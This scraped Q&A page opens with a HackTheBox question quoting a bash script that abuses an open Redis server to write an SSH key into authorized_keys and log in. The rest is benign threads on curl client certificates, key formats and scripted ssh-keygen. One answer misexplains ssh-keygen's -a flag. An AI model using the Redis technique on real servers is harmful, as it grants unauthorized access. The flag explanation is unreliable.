I am working on HackTheBox and have come across a question that Google has yet to answer. The current script looks like so:
#!/bin/bash
rm /root/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt"
redis-cli -h 10.10.10.160 flushall
cat "/root/Desktop/postmanKey.txt" | redis-cli -h 10.10.10.160 -x set bb
redis-cli -h 10.10.10.160 save
redis-cli -h 10.10.10.160 set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i "/root/.ssh/id_rsa" redis#10.10.10.160
I understand all of it except for one thing. Why do we do (echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt" to generate a public key with 2 trailing and 2 following newlines? I have done some tinkering and quite a few Google searches but I have yet to turn up the reason why this is necessary. If I push the file to the server without the newlines and then attempt to connect via ssh, I am unable to. My only thought is maybe this is something to do with the common format of private keys:
-----BEGIN RSA PRIVATE KEY-----
....
-----END RSA PRIVATE KEY-----
however, we are connecting with a private key, but pushing to the server a public key... hence why I am lost. Thank you for any information!
Related
I am trying to invoke the API using the curl command but unfortunately, I won't be able to keep the files. I am trying to pass the .key and .pem file's data in the command but I am not able to pass that correctly. Below is my command in my .sh file:
response=$(curl --key "$5" --cert "$6" -k -X "$2" -d "$payload" "$4")
I am calling the script below way:
key="${key}"
pem="${pem}"
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr "$key" "$pem"
It gives the below error:
curl: (58) could not load PEM client certificate from -----BEGIN CERTIFICATE-----
This command works fine if I pass the file directly so, is there any way to pass the data via string variables in the curl command?
If you only have your key data in a variable and can't write it to a file yourself for some reason, an alternative solution is to use process substitution.
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr \
<(printf '%s' "$key") \
<(printf '%s' "$pem")
This requires bash and still uses files under the hood, but it doesn't require you to manage the files yourself or know where they're located.
--key and --cert take the name of a file containing certificate data, not the certificate data itself.
... "$(cat my_client.key)" "$(cat my_client.pem)"
Should just be
... my_client.key my_client.pem
Is there a way to get the fingerprint of a passphrase protected ssh private key in go without knowing the passphrase?
I know it's possible using the openssh tools:
$ ssh-keygen -t rsa -b 4096 -f identity -N passphrase
# ...
$ ssh-keygen -l -f identity.pub
4096 SHA256:ecFemcAlOhQyFk/HWfAnx14T+SGuQImMvmEt+T1DarM x#x (RSA)
$ ssh-keygen -l -f identity
4096 SHA256:ecFemcAlOhQyFk/HWfAnx14T+SGuQImMvmEt+T1DarM x#x (RSA)
In go (golang.org/x/crypto/ssh) the ssh.ParsePrivateKey(key) returns a PassPhraseMissingError and a nil key, so I can't call ssh.FingerprintSHA256(key.PublicKey()) on it.
I would like to do this because then I could check if the agent can handle that key so that I don't need to let it try every key known by the agent when connecting.
I will preface this that I am extremely inexperienced with certs/keys and I am using a Mac.
My problem is with RSA and OPENSSH certs/keys. I currently have a valid RSA cert/key, but I need to convert them to OpenSSH. From my understanding, I want to do the opposite of this thread: Openssh Private Key to RSA Private Key
I have a file that starts with:
-----BEGIN RSA PRIVATE KEY-----
But I need to convert it to this:
-----BEGIN OPENSSH PRIVATE KEY-----
I have tried ssh-keygen -p -N "" -m pem -f /path/to/key and ssh-keygen -f /path/to/key -m pem but it does not output with the OPENSSH header I expected.
Is this possible?
If it is possible, what can I use to perform this conversion and what would a potential command be?
Do I need to do anything to convert the cert if I converted the key?
If I do need to convert the cert, what is the command for that?
If there is any further explanation on what converting from RSA to OPENSSH is, I would really appreciate it.
As long as you are using -m PEM in your command, the result won't be an OPENSSH format.
This will convert an RSA/PEM private key into an OPENSSH one:
ssh-keygen -p -N "" -f /path/to/key
You can then extract its public key and confirm it is identical to the one you have before:
ssh-keygen -y -f /path/to/key
I wonder if it is possible provide instead of file path file content itself. For example curl needs to specify file path to certificate. What to do when I have a certificate in variable?
I can't put it into stdin, because I'm generating xml to send there.
Why I put certificate into variable? Because at the end I'd like to have just one file with script, which can I easily distribute to my colleagues.
The only solution which come to my mind is to save variable to file and then provide file path to curl
read -d '' CERT << "CERTEND"
-----BEGIN CERTIFICATE-----
### something very secret here ###
-----END CERTIFICATE-----
CERTEND
curl -# -k --cert ??? -d #xml.xml -H "Content-Type: application/soap+xml" -H 'SOAPAction: ""' https://1.1.1.1/EndpointPort`
You can use process substitution:
curl --cert <(echo "$CERT") ...
which would create a pipe for you. The output of the command in parentheses goes to this pipe (echo $CERT in our case), and the filename of the pipe is returned.
I would like to create script, which simply runs ssh-keygen -t rsa. But how to pass to it 3 times enter?
Try:
ssh-keygen -t rsa -N "" -f my.key
-N "" tells it to use an empty passphrase (the same as two of the enters in an interactive script)
-f my.key tells it to store the key into my.key (change as you see fit).
The whole thing runs without you needing to supply any enter keys :)
To send enters to an interactive script:
echo -e "\n\n\n" | ssh-keygen -t rsa
a version with passphrase is:
$ ssh-keygen -t rsa -b 4096 -C "comment" -P "examplePassphrase" -f "desired pathAndName" -q
the -q is for silent
Source is http://linux.die.net/man/1/ssh-keygen
Agree with Michel Marro except that it needs some more:
If the file already exists, it will still be interactive asking if it has to overwrite it.
Use the answer of this question.
yes y | ssh-keygen -q -t rsa -N '' >/dev/null
The redirection to null is necessary to silence the overwrite message.
It is recommended to use ed25519 for security and performance.
yes "y" | ssh-keygen -o -a 100 -t ed25519 -C "Bla Bla" -f /mypath/bla -N ""
here
-o OpenSSH key format instead of older PEM (needs OpenSSH 6.5+)
-a Number of primality test while screening DH-GEX candidates
-t Type of key (ed25519, RSA, DSA etc.)
-f /mypath/bla The output file path and name
-N "" Use empty passphase
and yes "y" for no interaction.
It will generate two files
/mypath/bla
/mypath/bla.pub
where the bla file is private and bla.pub is public.
echo -e "\n"|ssh-keygen -t rsa -N ""